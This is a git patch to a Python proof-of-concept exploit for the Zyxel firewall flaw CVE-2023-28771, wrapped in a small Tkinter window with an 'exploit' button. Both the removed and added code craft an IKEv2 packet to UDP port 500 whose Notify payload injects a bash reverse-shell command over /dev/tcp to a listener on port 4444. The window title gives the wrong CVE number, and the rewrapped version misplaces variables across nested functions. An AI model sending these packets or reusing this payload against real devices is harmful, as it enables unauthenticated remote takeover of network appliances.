From 6477adcf48520e5117880f934ac91ef0f06772c0 Mon Sep 17 00:00:00 2001 From: ibrahim ali <82097150+abrahim7112@users.noreply.github.com> Date: Wed, 30 Aug 2023 10:46:11 -0400 Subject: [PATCH] Update CVE_2023_28771_poc.py Signed-off-by: ibrahim ali <82097150+abrahim7112@users.noreply.github.com> --- CVE_2023_poc/CVE_2023_28771_poc.py | 58 +++++++++++++++--------------- 1 file changed, 29 insertions(+), 29 deletions(-) diff --git a/CVE_2023_poc/CVE_2023_28771_poc.py b/CVE_2023_poc/CVE_2023_28771_poc.py index 90239f1..c1a33bf 100644 --- a/CVE_2023_poc/CVE_2023_28771_poc.py +++ b/CVE_2023_poc/CVE_2023_28771_poc.py @@ -10,39 +10,39 @@ from tkinter import ttk import requests -root = tkinter.Tk() -root.title("CVE_2023_0861 exploits") -root.geometry('600x400+0+0') -def printInput(): - inp = inputtxt.get(1.0, "end-1c") - lbl.config(text = "attack url : "+inp) +def exploitprint(): + root = tkinter.Tk() + root.title("CVE_2023_0861 exploits") + root.geometry('600x400+0+0') + def printInput(): + inp = inputtxt.get(1.0, "end-1c") + lbl.config(text = "attack url : "+inp) - scroll_y = Scrollbar(root, orient=VERTICAL) - txtarea = Text(root, yscrollcommand=scroll_y.set, font=( - "times new roman", 15, "bold"), fg="#3206b8") - scroll_y.pack(side=RIGHT, fill=Y) - scroll_y.config(command=txtarea.yview) - txtarea.pack(fill=BOTH, expand=1) + scroll_y = Scrollbar(root, orient=VERTICAL) + txtarea = Text(root, yscrollcommand=scroll_y.set, font=("times new roman", 15, "bold"), fg="#3206b8") + scroll_y.pack(side=RIGHT, fill=Y) + scroll_y.config(command=txtarea.yview) + txtarea.pack(fill=BOTH, expand=1) - rhost = inp - lhost = '0.0.0.0' - lport = '4444' + rhost = inp + lhost = '0.0.0.0' + lport = '4444' - load_contrib('ikev2') + load_contrib('ikev2') - cmd = "\";bash -c \"exec bash -i &>/dev/tcp/" + lhost + "/" + lport + " <&1;\";echo -n \"" + cmd = "\";bash -c \"exec bash -i &>/dev/tcp/" + lhost + "/" + lport + " <&1;\";echo -n \"" - packet = IP(dst = rhost) / UDP(dport = 500) / IKEv2(init_SPI = RandString(8), next_payload = 'Notify', exch_type = 'IKE_SA_INIT', flags='Initiator') / IKEv2_payload_Notify(next_payload = 'Nonce', type = 14, load = "HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB" + cmd) / IKEv2_payload_Nonce(next_payload = 'None', load = RandString(68)) + packet = IP(dst = rhost) / UDP(dport = 500) / IKEv2(init_SPI = RandString(8), next_payload = 'Notify', exch_type = 'IKE_SA_INIT', flags='Initiator') /IKEv2_payload_Notify(next_payload = 'Nonce', type = 14, load = "HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB" + cmd) / IKEv2_payload_Nonce(next_payload = 'None', load = RandString(68)) - send(packet) - txtarea.insert(END, packet) -Hacher = Label(root, text="Improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73,\n VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35,\n and ATP series firmware versions 4.60 through 5.35, which could allow an unauthenticated attacker\n to execute some OS commands remotely by sending crafted packets to an affected device.").pack() -Hacher = Label(root, text="Enter domin www.example.com : ").pack() -inputtxt = tk.Text(root,height = 1,width = 80) -inputtxt.pack() -printButton = tk.Button(root,text = "exploit", command = printInput) -printButton.pack() -lbl = tk.Label(root, text = "") -lbl.pack() -root.mainloop() \ No newline at end of file + send(packet) + txtarea.insert(END, packet) + Hacher = Label(root, text="Improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73,\n VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35,\n and ATP series firmware versions 4.60 through 5.35, which could allow an unauthenticated attacker\n to execute some OS commands remotely by sending crafted packets to an affected device.").pack() + Hacher = Label(root, text="Enter domin www.example.com : ").pack() + inputtxt = tk.Text(root,height = 1,width = 80) + inputtxt.pack() + printButton = tk.Button(root,text = "exploit", command = printInput) + printButton.pack() + lbl = tk.Label(root, text = "") + lbl.pack() + root.mainloop()